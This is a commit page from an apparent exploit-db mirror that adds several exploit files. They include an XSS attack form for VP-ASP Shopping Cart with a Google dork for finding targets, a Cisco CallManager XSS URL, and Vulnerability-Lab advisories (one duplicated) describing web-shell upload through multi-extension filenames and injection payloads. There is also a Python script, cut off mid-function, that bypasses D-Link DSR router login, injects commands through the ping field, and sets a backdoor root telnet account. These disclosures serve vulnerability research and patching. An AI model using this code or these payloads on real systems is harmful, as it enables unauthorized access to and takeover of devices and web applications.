bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 12_08_2013

Browse source
This commit is contained in:
Offensive Security 2013-12-08 16:08:13 +00:00
parent 2039e282e8
commit 5a468df6b9
383 changed files with 31976 additions and 28274 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4031
files.csv
View file

File diff suppressed because it is too large Load diff

0
platforms/webapps/10372.txt → platforms/aix/webapps/10372.txt
View file

0
platforms/webapps/11580.txt → platforms/aix/webapps/11580.txt
View file

9
platforms/asp/webapps/30048.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24033/info
VP-ASP Shopping Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VP-ASP Shopping Cart 6.50 is vulnerable; other versions may also be affected.
<!-- VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability A cross-site scripting vulnerability in VP-ASP Shopping Cart 6.50 was discovered. The vendor, VP-ASP, shipped an official patch on May 16th, 2007. Vulnerable Variable: type Vulnerable File: shopcontent.asp Vulnerable: VP-ASP Shopping Cart 6.50 (other versions should also be vulnerable) Google d0rk: intitle:"VP-ASP Shopping Cart 6.50" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 16th, 2007 !--> <html> <head><title>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=intitle%3A%22VP-ASP+Shopping+Cart+6.50%22">intitle:"VP-ASP Shopping Cart 6.50"</a> </font><br><br><br> <center>file <b>shopcontent.asp</b> - variable <b>type</b> - method <b>get</b></center><br> <form action="http://www.example.com/shop/shopcontent.asp" method="get"> <input size=75 name="type" value="<body onload=alert(1)>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html>

9
platforms/asp/webapps/30077.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24119/info
Cisco CallManager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Cisco CallManager 4.1.1 is reported vulnerable; other versions may also be affected.
https://www.example.com/CCMAdmin/serverlist.asp?findBy=servername&match=begins&pattern=[xss]

271
platforms/hardware/webapps/30031.txt Executable file
View file

@ -0,0 +1,271 @@
Document Title:
===============
Imagam iFiles v1.16.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1160
Release Date:
=============
2013-12-03
Vulnerability Laboratory ID (VL-ID):
====================================
1160
Common Vulnerability Scoring System:
====================================
8.9
Product & Service Introduction:
===============================
iFiles is the most intuitive file manager for iOS with features like connectivity to many file cloud services,
transferring files between computer or cloud services, ability to view many file formats (PDF viewer now
supports annotations, search and more), voice recorder, web downloader, text file editor and more.
Supported Online Cloud Services and Protocols: Dropbox, Google Drive, iCloud, Box.net, SkyDrive, SugarSync, AFP
(Mac Shares), FTP/FTPS, SFTP, Flickr, Picasa, Facebook, Rackspace CloudFiles, CloudApp, PogoPlug, WebDav, Amazon
S3, Ubuntu One Files, ownCloud, 4Shared, also using Amazon S3: DreamObjects and UltiCloud.
( Copy of the Homepage: https://itunes.apple.com/de/app/ifiles/id336683524 & http://imagam.com )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-03: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Imagam
Product: iFiles - Mobile Application iOS 1.16.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A file include- & arbitrary file upload web vulnerability has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
An arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access.
A file include web vulnerability allows a remote attacker to unauthorized include local web-server file requests or external file requests.
The vulnerability is located in the vulnerable file- and folder-name value. Remote attackers can include local file requests combined with script code
to successful exploit the issue. To include to the vulnerable foldername value it is required to manipulate the `create folder` (add) input (POST Method).
The secound possibility to inject is the vulnerable filename value of the misconfigured (POST Method) upload module. After the include the remote attacker
can access the included file by requesting the regular index or sub category folder (web interface) site.
The arbitrary file upload vulnerability is located in the vulnerable filename value of the upload module. Attackers are also able to upload a php or js
web-shells by renaming the file with multiple extensions. The attacker uploads for example a web-shell with the following name and extension
test.jpg.html.js.php.gif.jpg . After the upload the attacker opens the file in the web application to delete the .gif.jpg file extension to access the
resource with elevated execution access rights.
Exploitation of the file include & arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Upload
Vulnerable Parameter(s):
[+] filename (value) - (multiple extensions)
[+] foldername
Affected Module(s):
[+] File & Folder Dir Listing (http://localhost:8080)
1.2
2 local command/path injection web vulnerabilities has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the device name value of the file dir und sub category listing module. Local attackers are able to inject
own malicious system specific commands or path values requests as the iOS device name. The execute of the injected script code occurs in two
different section with persistent attack vector. The first section is the wifi app web-interface index file/folder dir listing. The secound
execute occurs in the file/folder sub category listing. The security risk of the local command/path inject vulnerability is estimated as high(-)
with a cvss (common vulnerability scoring system) count of 6.2(+)|(-)6.3.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execute of system specific commands or unauthorized path requests.
Request Method(s):
[+] POST to GET
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
Proof of Concept (PoC):
=======================
1.1
The file include and arbitrary file upload web vulnerability can be exploited by remote attackers without privileged web application
user account and also without user interaction. For security demonstration or to reproduce the vulnerability follow the provided
information and steps below.
PoC: foldername
<div id="headerHighlight">
<div id="header">
<div class="logo">
<img src="_device%20folder&path-issue-1_files/icon57.png" alt="icon57" height="57" width="57">
<h1>iFiles</h1>
</div>
<div class="deviceName">
<h4>device bkm337? </h4>
</div>
<div class="urlDiv">
<div class="outer">
<div class="inner">
<b>/>"<[FILE INCLUDE WEB VULNERABILITY!]%22"_device%20folder&[FILE INCLUDE WEB VULNERABILITY!]%22">x.com/</b>
</div>
</div>
</div>
</div>
</div>
</div>
PoC: filename (value)
<tr id="sfile0" url="/" filename="<EMBED SRC=" data:image"="">
<td class="fileName">
<a href="http://192.168.2.106:8080/%3CEMBED%20SRC=" data:image"=""><img class="fileIcon"
src="_device%20folder&path-issue-2_files/FolderIcon.png" alt="*">
<embed src="data:image%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%09%3C/
a%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%3C/td%3E%0A%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%3Ctd%20class=" filelastmod"="">Mon, 02 Dec 2013 15:50:10 GMT</a></td>
<td class="fileSize" align="right">--
<img style="display:none;" class="downloadIcon" src="_device%20folder&path-issue-2_files/downloadIcon.png"
alt="d" onclick="downloadFile('/<EMBED SRC=" data:image');"="">
<img class="deleteIcon" src="_device%20folder&path-issue-2_files/deleteIcon.png" alt="x"
title="Delete this file" onclick="deleteFile('#sfile0');" ="cursor:pointer;"="">
</td>
</tr>
<tr id="sfile1" url="/" filename="[FILE INCLUDE WEB VULNERABILITY!]%22">
<td class="fileName">
<a href="http://192.168.2.106:8080/%3E" <[FILE INCLUDE WEB VULNERABILITY!]%22"><img class="fileIcon"
src="_device%20folder&path-issue-2_files/FolderIcon.png" alt="*">
>"<[FILE INCLUDE WEB VULNERABILITY!]="_device%20folder&path-issue-2_files/a.htm" <="" a="">
</td>
1.2
The local command inject web vulnerability can be exploited by remote attackers with low privileged or restricted iOS device user account
and no user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: devicename
<div id="headerHighlight">
<div id="header">
<div class="logo">
<img src="device%20name__files/icon57.png" alt="icon57" height="57" width="57">
<h1>iFiles</h1>
</div>
<div class="deviceName">
<h4>d4vice><..[COMMAND/PATH INJECT VULNERABILITY!] </h4>
</div>
<div class="urlDiv">
<div class="outer">
<div class="inner">
<b>/</b>
</div>
</div>
</div>
</div>
</div>
Solution - Fix & Patch:
=======================
1.1
The file include vulnerability and arbitrary file upload vulnerability can be patched by a secure parse and encode of the vulnerable
filename and foldername values.
Encode also the vulnerable path sub category file dir listing and the index file dir listing. Recognize the path value.
1.2
To patch the local command inject web vulnerability it is required to encode the deviename value in the index and sub category sites
to prevent injects or requests.
Security Risk:
==============
1.1
The security risk of the file include and arbitrary file upload (restricted upload bypass) web vulnerability is estimated as critical.
1.2
The security risk of the local command/path inject web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

191
platforms/hardware/webapps/30055.txt Executable file
View file

@ -0,0 +1,191 @@
Document Title:
===============
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1152
Release Date:
=============
2013-12-04
Vulnerability Laboratory ID (VL-ID):
====================================
1152
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos
between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone,
from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your
devices under the same Wi-Fi network.
(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2012-11-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wireless Transfer App COM
Product: Wireless Transfer App 3.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected
command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Wireless Transfer App v3.7
Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album
Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low
user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the wireless transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
4. Switch back to the installed wireless transfer app and start the wifi transfer
5. Open the local web-server url http://localhost:6688/ (default link)
6. The local path/command execute occurs in the album name value of the photoGallery_head class
7. Successful reproduce of the vulnerability!
PoC: Album Name - photoGallery_head in the Album Sub Category List
<div class="header">
<div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
<div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
<div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
<div class="photoGallery_head">
<div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
<div class="phga_hd_right">
<input value="Zur?ck zur Sammlung" class="back" type="button">
</div>
</div>
</div>
PoC: Album Name - photoalbum in the Album Index List
<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
<dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl>
<dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
<img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl>
<dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
<img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl>
Reference(s):
http://localhost:6688/index.html
http://localhost:6688/albumhtm
http://localhost:6688/albumhtm?id=
http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable album name value.
Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
Security Risk:
==============
The security risk of the local command/path inject web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

191
platforms/hardware/webapps/30056.txt Executable file
View file

@ -0,0 +1,191 @@
Document Title:
===============
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1152
Release Date:
=============
2013-12-04
Vulnerability Laboratory ID (VL-ID):
====================================
1152
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos
between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone,
from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your
devices under the same Wi-Fi network.
(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2012-11-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wireless Transfer App COM
Product: Wireless Transfer App 3.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected
command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Wireless Transfer App v3.7
Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album
Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low
user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the wireless transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
4. Switch back to the installed wireless transfer app and start the wifi transfer
5. Open the local web-server url http://localhost:6688/ (default link)
6. The local path/command execute occurs in the album name value of the photoGallery_head class
7. Successful reproduce of the vulnerability!
PoC: Album Name - photoGallery_head in the Album Sub Category List
<div class="header">
<div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
<div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
<div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
<div class="photoGallery_head">
<div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
<div class="phga_hd_right">
<input value="Zur?ck zur Sammlung" class="back" type="button">
</div>
</div>
</div>
PoC: Album Name - photoalbum in the Album Index List
<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
<dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl>
<dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
<img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl>
<dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
<img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl>
Reference(s):
http://localhost:6688/index.html
http://localhost:6688/albumhtm
http://localhost:6688/albumhtm?id=
http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable album name value.
Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
Security Risk:
==============
The security risk of the local command/path inject web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

303
platforms/hardware/webapps/30062.py Executable file
View file

@ -0,0 +1,303 @@
#!/usr/bin/python
#
# CVEs: CVE-2013-5945 - Authentication Bypass by SQL-Injection
# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers: D-Link DSR-150 (Firmware < v1.08B44)
# D-Link DSR-150N (Firmware < v1.05B64)
# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Likely to work on: D-Link DWC-1000
#
# Download URL: http://tsd.dlink.com.tw
#
# Arch: mips and armv6l, Linux
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2013-08-18
#
# Purpose: Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites: Network access to the router ports 443 and 23.
# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# Coordinated Disclosure -- history and timeline:
#
# 2013-09-12: Informed Heise Security and asked for their support on this case
# 2013-09-13: Informed the manufacturer D-Link via
# http://www.dlink.com/us/en/support/security-advisories/report-vulnerabilities/ (contact form is buggy!)
# http://www.d-link.co.za/contactus/feedback/ (contact request submitted)
# http://www.dlink.com/de/de/contact-d-link (contact form is buggy!)
# mail@dlink.ru (contact request sent)
# info@dlink.ee (contact request sent)
# info@dlink.de (contact request sent)
# 2013-09-14: Informed the German Federal Office for Information Security (BSI) via certbund@bsi.bund.de
# 2013-09-16: D-Link Russia and D-Link Germany claim to have forwarded my request.
# 2013-09-17: German BSI responds, contact established.
# 2013-09-24: Requested CVE-IDs.
# 2013-09-25: Heise responds, contact established.
# 2013-09-27: D-Link asks for details on vulns and the exploit code.
# Mitre assigns two CVEs:
# CVE-2013-5945 -- authentication bypass
# CVE-2013-5946 -- privilege escalation
# 2013-09-30: D-Link has received the exploit and documentation via BSI
# 2013-11-29: Patches are available for the DSR router series via tsd.dlink.com.tw
# DSR-150: Firmware v1.08B44
# DSR-150N: Firmware v1.05B64
# DSR-250 and DSR-250N: Firmware v1.08B44
# DSR-500 and DSR-500N: Firmware v1.08B77
# DSR-1000 and DSR-1000N: Firmware v1.08B77
# 2013-12-03: Public Disclosure
#
# And now - the fun part :-)
#
import httplib
import urllib
import telnetlib
import time
import sys
import crypt
import random
import string
##############################
#
# CHANGE THESE VALUES -- BEGIN
#
# Your router's IP:PORT
ipaddr = "192.168.10.1:443"
# Password to be set (by this hack) on the backdoor account
bdpasswd = "password"
#
# CHANGE THESE VALUES -- END
#
# persistent config file: /tmp/teamf1.cfg.ascii
# Edit this file to make your changes persistent.
#
##############################
cookie = ""
pid = -2
bduser = ""
def request(m = "", u = "", b = "", h = ""):
global ipaddr
conn = httplib.HTTPSConnection(ipaddr, timeout = 15)
assert m in ["GET", "POST"]
conn.request(method = m, url = u, body = b, headers = h)
ret = conn.getresponse()
header = ret.getheaders()
data = ret.read()
conn.close()
return (header, data)
def login(user, passwd):
global ipaddr
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
'Content-Type': "application/x-www-form-urlencoded"}
body = {'thispage' : "index.htm",
'Users.UserName' : user,
'Users.Password' : passwd,
'button.login.Users.deviceStatus' : "Login",
'Login.userAgent' : "Exploit"}
return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
def logout():
global ipaddr, cookie
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
'Content-Type': "application/x-www-form-urlencoded"}
body = ""
return request("GET", "/scgi-bin/platform.cgi?page=index.htm", urllib.urlencode(body), headers)
def execCmd(cmd = None):
global ipaddr, cookie
assert cmd != None
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi?page=systemCheck.htm",
'Cookie': cookie,
'Content-Type': "application/x-www-form-urlencoded"}
body = {'thispage' : "systemCheck.htm",
'ping.ip' : "localhost;" + cmd,
'button.traceroute.diagDisplay' : "Traceroute"}
return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
def findPid(mystr = None):
# " 957 root 2700 S /usr/sbin/telnetd -l /bin/login"
assert mystr != None
mypid = 0
(h, d) = execCmd(cmd = "ps|grep telnetd|grep -v grep");
s = d.find(mystr)
if s > 0:
# telnetd is running
cand = d[s - 50 : s]
try:
mypid = int(cand.split("\n")[1].split()[0])
except IndexError:
mypid = int(cand.split(">")[1].split()[0])
return mypid
def restartTelnetd(mystr1 = None, mystr2 = None):
assert mystr1 != None and mystr2 != None
global pid
pid = findPid("telnetd -l /bin/")
